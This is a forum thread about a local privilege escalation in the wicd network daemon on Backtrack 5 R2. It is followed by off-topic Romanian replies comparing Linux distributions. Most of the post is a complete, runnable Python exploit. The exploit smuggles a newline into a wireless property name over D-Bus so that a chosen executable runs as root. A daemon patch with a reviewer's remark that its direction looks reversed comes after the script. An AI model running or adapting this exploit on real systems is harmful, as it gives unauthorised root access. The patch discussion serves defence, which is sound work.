
Backtrack 5 R2 wicd Privilege Escalation


Guest expl0iter
#!/usr/bin/python
#wicd 0day exploit discovered on 4.9.12 by InfoSec Institute student
#For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
import sys
import os
import time
import getopt

# Import guard for the wicd D-Bus helper.  The bare `except:` also catches
# SystemExit/KeyboardInterrupt and hides the real ImportError text;
# `except ImportError:` would be the narrower guard.  Note the script exits
# with status 0 even though this is an error condition.
try: from wicd import dbusmanager
except: print "[!] WICD Error: libraries are not available. Is WICD installed?"; sys.exit(0)

class Error(Exception):
    """Exception raised by this script for wicd / D-Bus failures.

    The human-readable message is kept on ``errorStr`` so that callers can
    print it directly (``main`` reads ``error.errorStr``).
    """

    def __init__(self, error):
        # Stored on an attribute instead of being handed to Exception.__init__,
        # which is how the rest of the script reads it back.
        self.errorStr = error

    def __str__(self):
        # %r keeps the surrounding quotes, matching repr().
        return "%r" % (self.errorStr,)


class Wicd():
    """Thin wrapper around the wicd D-Bus interfaces this script uses.

    Attributes (None until __init__ succeeds):
        wireless      -- the "wireless" D-Bus interface
        daemon        -- the "daemon" D-Bus interface
        versionString -- whatever daemon.Hello() returned
    """
    wireless = None
    daemon = None
    versionString = None

    def __init__(self):
        """Connect to the running wicd daemon over D-Bus.

        Raises:
            Error: when connecting or looking up either interface fails for
                any reason (everything, including KeyboardInterrupt, is
                reported as "Daemon is not running").
        """
        try:
            dbusmanager.connect_to_dbus()
            ifaces = dbusmanager.get_dbus_ifaces()
            self.wireless = ifaces["wireless"]
            self.daemon = ifaces["daemon"]
        except BaseException:
            raise Error("Daemon is not running")
        # Hello() is outside the try: a failure here propagates unchanged
        # rather than being reported as a missing daemon.
        self.versionString = self.daemon.Hello()

    def versionLessThan(self, version):
        """Return True if the daemon version is at or below ``version``.

        Despite the name the comparison is inclusive (<=).  ``version`` is an
        int made of the version digits with the dots removed (171 for
        "1.7.1"); ``versionString`` is flattened the same way, so a string
        such as "1.7.10" becomes 1710 and compares as newer than 171.
        """
        flattened = int(self.versionString.replace(".", ""))
        return flattened <= version


class Exploit():
    """Drive the wicd daemon over D-Bus to store a crafted wireless property.

    Daemon-side check this relies on (see the patch hunk further down this
    page): SetWirelessProperty() only refused property names whose stripped
    form ended in "script".  The name sent here carries an embedded newline
    and ends in "rooted", so the suffix test does not reject it; the script
    then relies on the daemon saving that name verbatim.  The defensive fix
    is to validate property names against an explicit allow-list
    (the ``_validProperties`` dict in the patch) rather than a suffix test.
    """

    def __init__(self, wicd, scriptPath):
        # wicd: a connected Wicd instance.
        # scriptPath: path placed in the "beforescript" entry; what the daemon
        # does with that entry is not visible in this file.
        self.wicd = wicd
        self.scriptPath = scriptPath

    def getNets(self):
        """Yield network indices 0..n-1 from a fresh scan.

        Rescans until the daemon reports at least one network; with no
        networks in range this loop never terminates.
        """
        self.wicd.wireless.Scan(True)
        nets = self.wicd.wireless.GetNumberOfNetworks()
        while nets < 1:
            self.wicd.wireless.Scan(True)
            nets = self.wicd.wireless.GetNumberOfNetworks()
        for net in range(nets):
            yield net

    def exploit(self):
        """Set and persist the crafted property on network 0, then reconnect.

        Returns True once ConnectWireless() has been issued for the network
        that carried the property.  Raises Error if either D-Bus write fails
        or the network cannot be found again after ReloadConfig().
        """
        for net in self.getNets(): pass # Priming scan.

        # The property *name* (not the value) contains the newline.
        try:
            self.wicd.wireless.SetWirelessProperty(0, "beforescript = "+ self.scriptPath +"\nrooted", "true")
        except:
            raise Error("Unable to exploit (SetWirelessProperty() failed.)")

        # Persist the same entry.  NOTE: the message below names the wrong
        # call; this branch covers SaveWirelessNetworkProperty().
        try:
            self.wicd.wireless.SaveWirelessNetworkProperty(0, "beforescript = "+ self.scriptPath +"\nrooted")
        except:
            raise Error("Unable to exploit (SetWirelessProperty() failed.)")

        # Remember which network occupied slot 0, in case indices change
        # across the rescan below.
        propertyKey = 'bssid' # Could be essid, or any other identifiable wireless property
        vulnIdentifier = self.wicd.wireless.GetWirelessProperty(0, propertyKey)

        # TODO: Does this need a try construct?
        self.wicd.wireless.ReloadConfig()

        for net in self.getNets(): # Implicit, but required re-scan.
            if self.wicd.wireless.GetWirelessProperty(net, propertyKey) == vulnIdentifier:
                self.wicd.wireless.ConnectWireless(net)
                return True
        raise Error("Unable to exploit (Lost the network we were using)")


def usage():
    """Print the command-line help to stdout (Python 2 print statement)."""
    lines = [
        "[!] Usage:",
        " ( -h, --help ):",
        " Print this message.",
        " ( --scriptPath= ): Required, executable to run as root.",
        " --scriptPath=/some/path/to/executable.sh",
    ]
    # One print of the joined text produces the same output as one print per line.
    print "\n".join(lines)

def main():
    """Parse arguments, connect to wicd and run the exploit.

    Every failure path prints a "[!]" message and exits with status 0,
    exactly as before; successes print "[*]" lines.
    """
    print "[$] WICD =< 1.7.0Day"
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "scriptPath="])
    except getopt.GetoptError as err:
        # getopt's own text, e.g. "option -a not recognized".
        print '[!] Parameter error:' + str(err)
        usage()
        sys.exit(0)

    scriptPath = None
    for opt, arg in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit(0)
        if opt == "--scriptPath":
            scriptPath = arg
            continue
        # getopt only returns the options declared above, so this is not reached.
        print "[!] Parameter error."
        usage()
        sys.exit(0)

    if not scriptPath:
        print "[!] Parameter error: scriptPath not set."
        usage()
        sys.exit(0)

    try:
        wicd = Wicd()
    except Error as error:
        print "[!] WICD Error: %s" % (error.errorStr)
        sys.exit(0)
    print "[*] WICD Connection Initialized! (Version: %s)" % (wicd.versionString)

    # versionLessThan() is inclusive, so 1.7.1 itself does not trigger this.
    if not wicd.versionLessThan(171):
        print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow."

    print "[*] Attempting to exploit:"
    try:
        Exploit(wicd, scriptPath).exploit()
    except Error as error:
        print "[!] Exploit Error: %s" % (error.errorStr)
        sys.exit(0)
    print "[*] Exploit appears to have worked."

# Run main() only when executed as a script, not when imported.
if __name__ == "__main__":
    main()




==========================================

PATCH:

- --- _wicd-daemon.py 2012-04-09 16:31:19.000000000 -0400
+++ wicd-daemon.py 2012-02-02 11:38:26.000000000 -0500
@@ -945,30 +945,6 @@
self._scanning = False
self.LastScan = []
self.config = ConfigManager(wireless_conf, debug=debug)
- -
- - #Using a dict to avoid repitition.
- - self._validProperties = {
- - 'bssid':None,
- - "essid":None,
- - "hidden":None,
- - "channel":None,
- - "mode":None,
- - "enctype":None,
- - "encryption_method":None,
- - "key":None,
- - "automatic":None,
- - "ip":None,
- - "netmask":None,
- - "broadcast":None,
- - "gateway":None,
- - "use_static_dns":None,
- - "use_global_dns":None,
- - "dns1":None,
- - "dns2":None,
- - "dns3":None,
- - "use_settings_globally":None,
- - "has_profile":None
- -}

def get_debug_mode(self):
return self._debug_mode
@@ -1088,7 +1064,7 @@
def SetWirelessProperty(self, netid, prop, value):
""" Sets property to value in network specified. """
# We don't write script settings here.
- - if (prop.strip() not in self._validProperties):
+ if (prop.strip()).endswith("script"):
print "Setting script properties through the daemon is not" \
+ " permitted."
return False
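Review bot: The direction of this patch looks reversed: the `---` side (`_wicd-daemon.py`, dated 2012-04-09) carries the `_validProperties` allow-list that the first hunk removes, while the `+++` side restores the `(prop.strip()).endswith("script")` suffix test, which is the weaker of the two checks — a suffix test on a caller-supplied key accepts any name that does not end in "script", including the multi-line name the script above sends. Read as a fix, the membership test `if (prop.strip() not in self._validProperties):` is the one to keep, and the `+`/`-` markers should be swapped before anyone applies this. The doubled `- -` markers look like dash-escaping from a clearsigned message and need reducing to a single `-` for `patch` to accept the hunk. SetWirelessProperty's body continues outside the hunk.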


Zice bine Muts ... Nu este de competenta echipei Backtrack sa faca/aplice un patch la un produs care nu este al lor ! Probabil exploitul pt Wicd este pentru toate distributiile dar a fost scos in fata doar pt ca este default in Backtrack !

@pyth0n3: Functioneaza destul de bine ca si OS instalat ... Eu nu am avut probleme pana acum cu el si in afara de stabilitatea conectiunii la wifi (wep/wpa) eu nu am avut nici cea ai mica problema cu el !


@pyth0n3: Functioneaza destul de bine ca si OS instalat ... Eu nu am avut probleme pana acum cu el si in afara de stabilitatea conectiunii la wifi (wep/wpa) eu nu am avut nici cea ai mica problema cu el !

Nu am zis ca nu functioneaza dar nu e ceea ce pare sau cel putin de cand nu mai e Slackware ,

Backtrack == Ubuntu , vine numit backtrack doar pentru un suite de tool-uri pe care le-au pus deasupra

Au trecut de la Slackware la Ubuntu deoarece nu ar fi avut un mare success avand in vedere faptul ca multi nu ar fi fost in grad sa instaleze un Slackware in schimb ubuntu e foarte usor de instalat si oricare poate avea backtrack (asa creste numele),Avand in vedere faptul ca nu e facut ca sa fie folosit ca un sistem de baza e ok , atata timp cat il folosesti din LiveCD .Evident se poate instala dar nu e definit ca un sistem de baza .As fi preferat slackware , de aceea eu nu folosesc backtrack (Asta e parerea mea)


pyth0n3 linux, ubuntu este cel mai bun, si nu te uita dupa nume, de back track 5.r2 sau precum e fedora sau mandrila, si asa mai departe,ca e vorba de reclama, folositi ubuntu, e si mai bun ca back track, ceea ce ai in back track poti pune in ubuntu.in plus back track, nu numai live cd, si instalat bine facuta bine partitia, dupa aia ruleaza bine, dar eu tot raman cu ubuntu.

Link to comment
Share on other sites

@vladimir: Vorbesti aiurea ... Backtrack este 95% Ubuntu si "vine numit backtrack doar pentru suitele de tool-uri instalate " dupa cum a precizat Pythone ! BTW se numeste Mandriva ... Si nu poti spune ca Ubuntu este cea mai buna distributie doar pentru ca iti place tie sau ca toti copii pot da clickuri si cred ei ca stiu linux !Intradevar Ubuntu are parte de cel mai bun suport la ora actuala dar daca ai probleme in loc sa incerci sa le rezolvi fugi repede la nenea gogu si dai copy/paste de pe forumuri !! Cea mai buna distributie este cea cu care lucrezi tu personal cel mai bine .. Si asta o sa iti spuna orice sysadmin cat de cat competent !

@pythone: sunt sigur ca cei care folosesc Backtrack exact pentru ceea ce a fost creat stiu/"sunt in stare" sa instaleze Slackware ... Cel mai probabil alegerea lor a fost facuta pentru popularitatea distributiei si pentru ca 99% din persoanele care stiu sa lucreze in astfel de medii se simt cat de cat confortabil cu Ubuntu !


pyth0n3 linux, ubuntu este cel mai bun, si nu te uita dupa nume,

Singurele distro Linux despre care putem vorbi si pune in confrunt intre ele sunt: Debian,RedHat,Slackware,Suse, restul sunt doar derivate , Ubuntu e un derivat si nu il voi pune in confrunt cu nici una din distributiile de mai sus.

Eu cand voi vorbi de Linux ma voi referi doar la 4 distributii iar cand ma voi referi la derivate voi specifica cine este tatal.

@pythone: sunt sigur ca cei care folosesc Backtrack exact pentru ceea ce a fost creat stiu/"sunt in stare" sa instaleze Slackware ...

In privinta asta nu am nici un dubiu, ma refeream la final users.Sunt mai multi fani Ubuntu si e mai usor de aceea au ales ca suit-ul de tool-uri sa fie in ubuntu.Eu as fi preferat sa ramana o distributie pura ca Slackware .(Asta e doar una din parerile mele)Ei au facut ceea ce au crezut mai bine pentru final users.

Oricum e destinat pentru pentesting LiveCD dar poate fi si instalat evident.


Interesanta descoperire. Pt cei care stiu cu ce se mananca backtrack: cum te conectezi la un backtrack prin retea cand singurul serviciu este postgresql cu bind 127.0.0.1?

Cat despre disctutia offtopic de mai sus: Ce conteaza pe ce OS au pus utilitarele ? Probabil ca au ales uBuntu tocmai pt ca kernelul e compilat cu full support pentru cam tot ce misca networking/video/sound .

